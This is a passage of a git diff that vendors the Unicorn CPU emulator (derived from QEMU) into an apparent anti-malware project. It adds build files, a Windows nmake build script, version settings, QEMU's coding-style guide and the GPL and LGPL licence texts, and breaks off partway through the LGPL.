<UniqueIdentifier>{9b7b99b2-982e-46b5-aff2-1ff3a353d3db}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\cpu-qom.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\cc_helper_template.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\cpu.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\helper.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\ops_sse.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\ops_sse_header.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\shift_helper_template.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\svm.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\topology.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\unicorn.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\x86_64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\i386\pc.c"> + <Filter>hw\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\i386\pc_piix.c"> + <Filter>hw\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\intc\apic.c"> + <Filter>hw\intc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\intc\apic_common.c"> + <Filter>hw\intc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\arch_memory_mapping.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\cc_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\cpu.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\excp_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\fpu_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\int_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\mem_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\misc_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\seg_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\smm_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\svm_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\translate.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\unicorn.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/nmake.bat b/ai_anti_malware/unicorn/unicorn-master/nmake.bat new file mode 100644 index 0000000..e2a192b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/nmake.bat @@ -0,0 +1,40 @@ +:: Unicorn Emulator Engine +:: Build Unicorn libs on Windows with CMake & Nmake +:: Usage: nmake.bat [x86 arm aarch64 m68k mips sparc], default build all. +:: By Huitao Chen, 2019 + +@echo off + +set flags="-DCMAKE_BUILD_TYPE=Release" + +set allparams= + +:loop +set str=%1 +if "%str%"=="" ( + goto end +) +set allparams=%allparams% %str% +shift /0 +goto loop + +:end +if "%allparams%"=="" ( + goto eof +) +:: remove left, right blank +:intercept_left +if "%allparams:~0,1%"==" " set "allparams=%allparams:~1%" & goto intercept_left + +:intercept_right +if "%allparams:~-1%"==" " set "allparams=%allparams:~0,-1%" & goto intercept_right + +:eof + +if "%allparams%"=="" ( +cmake "%flags%" -G "NMake Makefiles" .. +) else ( +cmake "%flags%" "-DUNICORN_ARCH=%allparams%" -G "NMake Makefiles" .. +) + +nmake diff --git a/ai_anti_malware/unicorn/unicorn-master/pkgconfig.mk b/ai_anti_malware/unicorn/unicorn-master/pkgconfig.mk new file mode 100644 index 0000000..d9c3974 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/pkgconfig.mk @@ -0,0 +1,13 @@ +# Package version of Unicorn for Makefile. +# To be used to generate unicorn.pc for pkg-config +# Also used to generate python package version + +# version major & minor +PKG_MAJOR = 1 +PKG_MINOR = 0 + +# version bugfix level. Example: PKG_EXTRA = 1 +PKG_EXTRA = 2 + +# version tag. Examples: rc1, b2, post1 +# PKG_TAG = rc6 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/CODING_STYLE b/ai_anti_malware/unicorn/unicorn-master/qemu/CODING_STYLE new file mode 100644 index 0000000..d46cfa5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/CODING_STYLE @@ -0,0 +1,107 @@ +QEMU Coding Style +================= + +Please use the script checkpatch.pl in the scripts directory to check +patches before submitting. + +1. Whitespace + +Of course, the most important aspect in any coding style is whitespace. +Crusty old coders who have trouble spotting the glasses on their noses +can tell the difference between a tab and eight spaces from a distance +of approximately fifteen parsecs. Many a flamewar have been fought and +lost on this issue. + +QEMU indents are four spaces. Tabs are never used, except in Makefiles +where they have been irreversibly coded into the syntax. +Spaces of course are superior to tabs because: + + - You have just one way to specify whitespace, not two. Ambiguity breeds + mistakes. + - The confusion surrounding 'use tabs to indent, spaces to justify' is gone. + - Tab indents push your code to the right, making your screen seriously + unbalanced. + - Tabs will be rendered incorrectly on editors who are misconfigured not + to use tab stops of eight positions. + - Tabs are rendered badly in patches, causing off-by-one errors in almost + every line. + - It is the QEMU coding style. + +Do not leave whitespace dangling off the ends of lines. + +2. Line width + +Lines are 80 characters; not longer. + +Rationale: + - Some people like to tile their 24" screens with a 6x4 matrix of 80x24 + xterms and use vi in all of them. The best way to punish them is to + let them keep doing it. + - Code and especially patches is much more readable if limited to a sane + line length. Eighty is traditional. + - It is the QEMU coding style. + +3. Naming + +Variables are lower_case_with_underscores; easy to type and read. Structured +type names are in CamelCase; harder to type but standing out. Enum type +names and function type names should also be in CamelCase. Scalar type +names are lower_case_with_underscores_ending_with_a_t, like the POSIX +uint64_t and family. Note that this last convention contradicts POSIX +and is therefore likely to be changed. + +When wrapping standard library functions, use the prefix qemu_ to alert +readers that they are seeing a wrapped version; otherwise avoid this prefix. + +4. Block structure + +Every indented statement is braced; even if the block contains just one +statement. The opening brace is on the line that contains the control +flow statement that introduces the new block; the closing brace is on the +same line as the else keyword, or on a line by itself if there is no else +keyword. Example: + + if (a == 5) { + printf("a was 5.\n"); + } else if (a == 6) { + printf("a was 6.\n"); + } else { + printf("a was something else entirely.\n"); + } + +Note that 'else if' is considered a single statement; otherwise a long if/ +else if/else if/.../else sequence would need an indent for every else +statement. + +An exception is the opening brace for a function; for reasons of tradition +and clarity it comes on a line by itself: + + void a_function(void) + { + do_something(); + } + +Rationale: a consistent (except for functions...) bracing style reduces +ambiguity and avoids needless churn when lines are added or removed. +Furthermore, it is the QEMU coding style. + +5. Declarations + +Mixed declarations (interleaving statements and declarations within blocks) +are not allowed; declarations should be at the beginning of blocks. In other +words, the code should not generate warnings if using GCC's +-Wdeclaration-after-statement option. + +6. Conditional statements + +When comparing a variable for (in)equality with a constant, list the +constant on the right, as in: + +if (a == 1) { + /* Reads like: "If a equals 1" */ + do_something(); +} + +Rationale: Yoda conditions (as in 'if (1 == a)') are awkward to read. +Besides, good compilers already warn users when '==' is mis-typed as '=', +even when the constant is on the right. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING b/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING new file mode 100644 index 0000000..00ccfbb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + <signature of Ty Coon>, 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING.LIB b/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING.LIB new file mode 100644 index 0000000..48afc2e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING.LIB @@ -0,0 +1,504 @@ + GNU LESSER GENERAL PUBLIC LICENSE + Version 2.1, February 1999 + + Copyright (C) 1991, 1999 Free Software Foundation, Inc. + 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + +[This is the first released version of the Lesser GPL. It also counts + as the successor of the GNU Library Public License, version 2, hence + the version number 2.1.] + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +Licenses are intended to guarantee your freedom to share and change +free software--to make sure the software is free for all its users. + + This license, the Lesser General Public License, applies to some +specially designated software packages--typically libraries--of the +Free Software Foundation and other authors who decide to use it. You +can use it too, but we suggest you first think carefully about whether +this license or the ordinary General Public License is the better +strategy to use in any particular case, based on the explanations below. + + When we speak of free software, we are referring to freedom of use, +not price. Our General Public Licenses are designed to make sure that +you have the freedom to distribute copies of free software (and charge +for this service if you wish); that you receive source code or can get +it if you want it; that you can change the software and use pieces of +it in new free programs; and that you are informed that you can do +these things. + + To protect your rights, we need to make restrictions that forbid +distributors to deny you these rights or to ask you to surrender these +rights. These restrictions translate to certain responsibilities for +you if you distribute copies of the library or if you modify it. + + For example, if you distribute copies of the library, whether gratis +or for a fee, you must give the recipients all the rights that we gave +you. You must make sure that they, too, receive or can get the source +code. If you link other code with the library, you must provide +complete object files to the recipients, so that they can relink them +with the library after making changes to the library and recompiling +it. And you must show them these terms so they know their rights. + + We protect your rights with a two-step method: (1) we copyright the +library, and (2) we offer you this license, which gives you legal +permission to copy, distribute and/or modify the library. + + To protect each distributor, we want to make it very clear that +there is no warranty for the free library. Also, if the library is +modified by someone else and passed on, the recipients should know +that what they have is not the original version, so that the original +author's reputation will not be affected by problems that might be +introduced by others. + + Finally, software patents pose a constant threat to the existence of +any free program. We wish to make sure that a company cannot +effectively restrict the users of a free program by obtaining a +restrictive license from a patent holder. Therefore, we insist that +any patent license obtained for a version of the library must be +consistent with the full freedom of use specified in this license. + + Most GNU software, including some libraries, is covered by the +ordinary GNU General Public License. This license, the GNU Lesser +General Public License, applies to certain designated libraries, and +is quite different from the ordinary General Public License. We use +this license for certain libraries in order to permit linking those +libraries into non-free programs. + + When a program is linked with a library, whether statically or using +a shared library, the combination of the two is legally speaking a +combined work, a derivative of the original library. The ordinary +General Public License therefore permits such linking only if the +entire combination fits its criteria of freedom. The Lesser General +Public License permits more lax criteria for linking other code with +the library. + + We call this license the "Lesser" General Public License because it +does Less to protect the user's freedom than the ordinary General +Public License. It also provides other free software developers Less +of an advantage over competing non-free programs. These disadvantages +are the reason we use the ordinary General Public License for many +libraries. However, the Lesser license provides advantages in certain +special circumstances. + + For example, on rare occasions, there may be a special need to +encourage the widest possible use of a certain library, so that it becomes +a de-facto standard. To achieve this, non-free programs must be +allowed to use the library. A more frequent case is that a free +library does the same job as widely used non-free libraries. In this +case, there is little to gain by limiting the free library to free +software only, so we use the Lesser General Public License. + + In other cases, permission to use a particular library in non-free +programs enables a greater number of people to use a large body of +free software. For example, permission to use the GNU C Library in +non-free programs enables many more people to use the whole GNU +operating system, as well as its variant, the GNU/Linux operating +system. + + Although the Lesser General Public License is Less protective of the +users' freedom, it does ensure that the user of a program that is +linked with the Library has the freedom and the wherewithal to run +that program using a modified version of the Library. + + The precise terms and conditions for copying, distribution and +modification follow. Pay close attention to the difference between a +"work based on the library" and a "work that uses the library". The +former contains code derived from the library, whereas the latter must +be combined with the library in order to run. + + GNU LESSER GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License Agreement applies to any software library or other +program which contains a notice placed by the copyright holder or +other authorized party saying it may be distributed under the terms of +this Lesser General Public License (also called "this License"). +Each licensee is addressed as "you". + + A "library" means a collection of software functions and/or data +prepared so as to be conveniently linked with application programs +(which use some of those functions and data) to form executables. + + The "Library", below, refers to any such software library or work +which has been distributed under these terms. A "work based on the +Library" means either the Library or any derivative work under +copyright law: that is to say, a work containing the Library or a +portion of it, either verbatim or with modifications and/or translated +straightforwardly into another language. (Hereinafter, translation is +included without limitation in the term "modification".) + + "Source code" for a work means the preferred form of the work for +making modifications to it. For a library, complete source code means +all the source code for all modules it contains, plus any associated +interface definition files, plus the scripts used to control compilation +and installation of the library. + + Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running a program using the Library is not restricted, and output from +such a program is covered only if its contents constitute a work based +on the Library (independent of the use of the Library in a tool for +writing it). Whether that is true depends on what the Library does +and what the program that uses the Library does. + + 1. You may copy and distribute verbatim copies of the Library's +complete source code as you receive it, in any medium, provided that +you conspicuously and appropriately publish on each copy an +appropriate copyright notice and disclaimer of warranty; keep intact +all the notices that refer to this License and to the absence of any +warranty; and distribute a copy of this License along with the +Library. + + You may charge a fee for the physical act of transferring a copy, +and you may at your option offer warranty protection in exchange for a +fee. + + 2. You may modify your copy or copies of the Library or any portion +of it, thus forming a work based on the Library, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) The modified work must itself be a software library. + + b) You must cause the files modified to carry prominent notices + stating that you changed the files and the date of any change. + + c) You must cause the whole of the work to be licensed at no + charge to all third parties under the terms of this License. + + d) If a facility in the modified Library refers to a function or a + table of data to be supplied by an application program that uses + the facility, other than as an argument passed when the facility + is invoked, then you must make a good faith effort to ensure that, + in the event an application does not supply such function or + table, the facility still operates, and performs whatever part of + its purpose remains meaningful. + + (For example, a function in a library to compute square roots has + a purpose that is entirely well-defined independent of the + application. Therefore, Subsection 2d requires that any + application-supplied function or table used by this function must + be optional: if the application does not supply it, the square + root function must still compute square roots.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Library, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Library, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote +it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Library. + +In addition, mere aggregation of another work not based on the Library +with the Library (or with a work based on the Library) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may opt to apply the terms of the ordinary GNU General Public +License instead of this License to a given copy of the Library. To do +this, you must alter all the notices that refer to this License, so +that they refer to the ordinary GNU General Public License, version 2, +instead of to this License. (If a newer version than version 2 of the +ordinary GNU General Public License has appeared, then you can specify +that version instead if you wish.) Do not make any other change in +these notices. + + Once this change is made in a given copy, it is irreversible for +that copy, so the ordinary GNU General Public License applies to all +subsequent copies and derivative works made from that copy. + + This option is useful when you wish to copy part of the code of +the Library into a program that is not a library. + + 4. You may copy and distribute the Library (or a portion or +derivative of it, under Section 2) in object code or executable form +under the terms of Sections 1 and 2 above provided that you accompany +it with the complete corresponding machine-readable source code, which +must be distributed under the terms of Sections 1 and 2 above on a +medium customarily used for software interchange. + + If distribution of object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the +source code from the same place satisfies the requirement to +distribute the source code, even though third parties are not +compelled to copy the source along with the object code. + + 5. A program that contains no derivative of any portion of the +Library, but is designed to work with the Library by being compiled or +linked with it, is called a "work that uses the Library". Such a +work, in isolation, is not a derivative work of the Library, and +therefore falls outside the scope of this License. + + However, linking a "work that uses the Library" with the Library +creates an executable that is a derivative of the Library (because it +contains portions of the Library), rather than a "work that uses the +library". The executable is therefore covered by this License. +Section 6 states terms for distribution of such executables. + + When a "work that uses the Library" uses material from a header file +that is part of the Library, the object code for the work may be a +derivative work 